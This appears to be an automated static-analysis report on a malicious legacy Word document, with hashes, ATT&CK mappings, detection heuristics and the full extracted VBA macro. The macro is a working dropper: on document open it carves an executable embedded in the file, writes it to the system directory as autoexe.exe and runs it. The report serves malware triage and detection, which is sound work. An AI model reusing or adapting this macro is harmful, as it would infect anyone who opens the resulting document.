Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 dd9de5fe32546f9f…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 36.0 KB
Created: 2004-05-13 02:47:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: 98185904ecd20b7042d6516ae69864da
SHA-1: c0d66cfa7a12cd73c34dcc2fe0869cefe9bdd853
SHA-256: dd9de5fe32546f9f62500259b333048e1d10139ec676b3cfc9c0c555cade0bf2
Risk score: 180

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a legacy Word document containing a VBA macro. The 'Document_Open' subroutine calls 'Module1.abc', which in turn uses the 'Shell()' function. This indicates the macro is designed to execute arbitrary commands, a common technique for downloading and executing further malicious stages. The presence of legacy WordBasic auto-exec markers further supports this.

Heuristics (5)

  • VBA macros detected (medium; 3 related findings) [OLE_VBA_MACROS]
    Document contains VBA macro code.
  • Shell() call in VBA (critical) [OLE_VBA_SHELL]
    The VBA project calls Shell().
  • Document_Open macro (high) [OLE_VBA_DOCOPEN]
    The VBA project contains a Document_Open auto-execution subroutine.
  • VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    The compiled VBA/cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches p-code-only macro documents, and documents whose source extraction failed, where no visible source is available.
  • Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface; by itself it is not a downloader or parser-CVE attribution.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3772 bytes
SHA-256: 20eb6e5f837e665822d13edae6a23acafe63ac54ffe80ae9c6a20ddc51a1f410
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True


Private Sub Document_Open()
Module1.abc
End Sub

Attribute VB_Name = "Module1"
Option Compare Text

Public Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal lpSecurityAttributes As Long, ByVal dwCreationDistribution As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplate As Long) As Long
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Public Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Byte, ByVal dwNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, ByVal lpOverlapped As Long) As Long
Public Declare Function WriteFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Byte, ByVal dwNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, ByVal lpOverlapped As Long) As Long
Public Declare Function SetFilePointer Lib "kernel32" (ByVal hFile As Long, ByVal lDistanceToMove As Long, ByVal lpDistanceToMoveHigh As Long, ByVal dwMoveMethod As Long) As Long
Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function SetCurrentDirectory Lib "kernel32" Alias "SetCurrentDirectoryA" (ByVal lpBuffer As String) As Boolean
Declare Function GetFileSize Lib "kernel32" (ByVal hFile As Long, lpFileSizeHigh As Long) As Long

Public Const GENERIC_READ As Long = &H80000000
Public Const GENERIC_WRITE As Long = &H40000000
Public Const FILE_SHARE_READ As Long = 1
Public Const FILE_SHARE_WRITE As Long = 2
Public Const CREATE_NEW As Long = 1
Public Const CREATE_ALWAYS As Long = 2
Public Const OPEN_EXISTING As Long = 3
Public Const OPEN_ALWAYS As Long = 4
Public Const TRUNCATE_EXISTING As Long = 5
Public Const INVALID_HANDLE_VALUE As Long = -1
Public Const FILE_ATTRIBUTE_NORMAL As Long = &H80

Public Function abc()


On Error Resume Next
   Dim buffer(65536) As Byte
   Dim h, h2, j, i, k As Long
   Dim sSave As String
   Dim Ret As Long
   Dim Border As Long
   Dim Data(8) As Byte
   Dim FileSize As Long
   Dim Tmp As Byte
   
   
   
    sSave = Space(255)
    Ret = GetSystemDirectory(sSave, 255)
    sSave = Left$(sSave, Ret)
    pathst = sSave & "\autoexe.exe"

   
   h = CreateFile(Application.ActiveDocument.FullName, GENERIC_READ, FILE_SHARE_READ + FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0)
   h2 = CreateFile(pathst, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, 0)
   If h = INVALID_HANDLE_VALUE Then
      Exit Function
   End If
        
   FileSize = GetFileSize(h, Border)
   Border = 1
  
   Do
        For i = 1 To 7
            Data(i) = Data(i + 1)
        Next i
        i = ReadFile(h, Tmp, 1, j, 0)
        Data(8) = Tmp
         
        If (Data(1) = &H4D And Data(2) = &H5A) Then ' And Data(3) = &H90 And Data(4) = &H0 And Data(5) = &H3 And Data(6) = &H0 And Data(7) = &H0 And Data(8) = &H0) Then
            Exit Do
        End If
        
        Border = Border + 1
        
   Loop While Border < FileSize
   
   k = SetFilePointer(h, Border - 8, nil, 0)
   Do
      i = ReadFile(h, buffer(0), 65536, j, 0)
      i = WriteFile(h2, buffer(0), j, j, 0)
   Loop Until j < 65536
   
   CloseHandle (h)
   CloseHandle (h2)
    
    j = 0
    Do
     SetCurrentDirectory (sSave)
     j = j + 1
    Loop Until j < 10
    
   Shell (pathst)
   
End Function